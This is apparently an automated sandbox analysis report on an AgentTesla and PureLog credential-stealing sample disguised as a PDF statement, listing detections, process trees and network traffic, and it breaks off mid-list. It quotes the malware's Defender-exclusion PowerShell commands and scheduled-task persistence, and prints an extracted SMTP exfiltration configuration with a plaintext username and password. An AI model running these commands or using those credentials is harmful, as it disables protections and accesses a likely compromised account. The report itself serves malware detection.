Windows Analysis Report
Statement of Account PDF.bat.exe

Overview

General Information

Sample name: Statement of Account PDF.bat.exe
Analysis ID: 1432040
MD5: 8db4915ba4e6bb27cb249554a18a9f4c
SHA1: fd3e06212f9da365c2106dcd808caf291ccb3a2a
SHA256: 470e7bcb766a436b50d28e362621b59467b6e6aa4146b467f4175a8b5c9eaa04
Tags: AgentTesla, bat, exe, Shipping

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Statement of Account PDF.bat.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • gDdsxauPhk.exe (PID: 7440 cmdline: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • schtasks.exe (PID: 7668 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gDdsxauPhk.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • gDdsxauPhk.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • WerFault.exe (PID: 7796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1816 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • BjTxJte.exe (PID: 8032 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • schtasks.exe (PID: 7096 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 7220 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • WerFault.exe (PID: 7192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 1828 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • BjTxJte.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • schtasks.exe (PID: 7708 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 7752 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • WerFault.exe (PID: 7936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7400 -s 1788 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fascia-arch.com", "Username": "brian@fascia-arch.com", "Password": "HERbertstown1987"}
Source | Rule | Description | Author
0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.4080192144.00000000030D3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author
0.2.Statement of Account PDF.bat.exe.7600000.7.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Statement of Account PDF.bat.exe.3949970.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
25.2.BjTxJte.exe.4798530.6.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ProcessId: 7156, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ProcessId: 7252, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BjTxJte
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe, ParentImage: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe, ParentProcessId: 7440, ParentProcessName: gDdsxauPhk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp", ProcessId: 7668, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.195.61, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", ProcessId: 7080, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ProcessId: 7156, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", ProcessId: 7080, ProcessName: schtasks.exe
                      No Snort rule has matched

                      AV Detection

                      Source: 25.2.BjTxJte.exe.4798530.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fascia-arch.com", "Username": "brian@fascia-arch.com", "Password": "HERbertstown1987"}
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, ReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Virustotal: Detection: 56%
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe, ReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe, Virustotal: Detection: 56%
                      Source: Statement of Account PDF.bat.exe, ReversingLabs: Detection: 47%
                      Source: Statement of Account PDF.bat.exe, Virustotal: Detection: 56%
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe, Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, Joe Sandbox ML: detected
                      Source: Statement of Account PDF.bat.exe, Joe Sandbox ML: detected
                      Source: Statement of Account PDF.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49755 version: TLS 1.2
                      Source: Statement of Account PDF.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Data.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Accessibility.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbu source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Configuration.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: UbK.pdb source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe.0.dr, BjTxJte.exe.8.dr, WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdbMZ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: System.Core.pdbMZ@ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: System.Xml.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Core.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Drawing.pdbt source: WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbMZ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: Accessibility.pdbSystem.ni.dllSystem.Core.dll4 source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: mscorlib.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Drawing.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: UbK.pdbSHA256 source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe.0.dr, BjTxJte.exe.8.dr
                      Source: Binary string: System.Core.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdb4 source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: Accessibility.pdbMZ source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.pdb, source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BjTxJte.exe_f5c09dd75b90d612af8c658c8837992c387ee89_843aacda_4690c535-c6af-41e6-8128-f3000ded106c\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_gDdsxauPhk.exe_e2c8de6e9dfbc3bf198524a8a8bae3ea56c2edb2_cb724c00_6c828731-bc0c-4d10-93b3-5ed4934f0644\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
                      Source: global trafficTCP traffic: 192.168.2.4:49736 -> 50.87.195.61:587
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 50.87.195.61 50.87.195.61
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: mail.fascia-arch.com
                      Source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe, BjTxJte.exe: String found in binary or memory: http://mail.fascia-arch.com
                      Source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe: String found in binary or memory: http://r3.i.lencr.org/0
                      Source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe: String found in binary or memory: http://r3.o.lencr.org0
                      Source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe, BjTxJte.exe: String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Statement of Account PDF.bat.exe: String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Statement of Account PDF.bat.exe: String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlqX
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151590709.0000000007DE4000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.0000000001040000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, 